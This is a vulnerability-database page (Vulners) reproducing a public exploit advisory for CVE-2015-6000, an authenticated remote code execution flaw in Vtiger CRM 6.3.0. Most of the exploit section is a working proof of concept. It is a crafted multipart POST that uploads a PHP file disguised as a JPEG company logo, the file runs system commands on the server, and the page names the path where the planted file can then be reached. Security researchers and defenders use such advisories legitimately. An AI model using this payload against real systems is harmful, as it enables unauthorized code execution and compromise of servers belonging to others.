Vulners
Lucene search
Vtiger CRM 6.3.0 Authenticated Remote Code Execution
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload Exploit | 31 Mar 201800:00 | – | zdt |
| Vtiger CRM 6.3.0 Authenticated Logo Upload Remote Command Execution Exploit | 31 Jul 201800:00 | – | zdt |
 | CVE-2015-6000 | 30 Jul 201817:42 | – | circl |
 | vtiger Company Logo Upload Arbitrary Command Execution Vulnerability | 3 Oct 201500:00 | – | cnvd |
 | CVE-2015-6000 | 6 Feb 202013:55 | – | cve |
 | CVE-2015-6000 | 6 Feb 202013:55 | – | cvelist |
 | vTiger File Upload | 26 Feb 201800:00 | – | dsquare |
 | vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution | 28 Sep 201500:00 | – | exploitdb |
| Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit) | 30 Mar 201800:00 | – | exploitdb |
 | Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit) | 30 Mar 201800:00 | – | exploitpack |
10
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== Description ===
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== PoC ===
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040
-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"
[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg
<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
The resulting PHP file can then be accessed at
[Vtiger URL]/test/logo/2.php
# 0day.today [2018-02-17] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Sep 2015 00:00Current
8High risk
Vulners AI Score8
EPSS0.76812